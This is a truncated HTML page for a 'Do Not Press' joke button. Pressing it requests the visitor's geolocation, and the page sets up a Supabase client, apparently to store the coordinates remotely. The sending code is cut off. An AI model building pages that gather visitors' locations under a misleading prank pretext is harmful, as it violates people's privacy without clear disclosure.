<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Do Not Press</title>

<script src="https://cdn.jsdelivr.net/npm/@supabase/supabase-js@2"></script>

<style>
body{
background:black;
color:red;
display:flex;
justify-content:center;
align-items:center;
height:100vh;
font-family:monospace;
}

button{
background:black;
color:red;
border:2px solid red;
padding:20px 40px;
font-size:20px;
cursor:pointer;
}
</style>
</head>

<body>

<button onclick="press()">DO NOT PRESS</button>

<script>

const supabase = window.supabase.createClient(
"https://wfdznmedvdoakdjdogqh.supabase.co",
"sb_publishable_ErhCPnxIZz-5VKOvE1oPnA_5KwyISi_"
)

function press(){

navigator.geolocation.getCurrentPosition(async (pos)=>{

let lat = pos.coords.latitude
let lng = pos
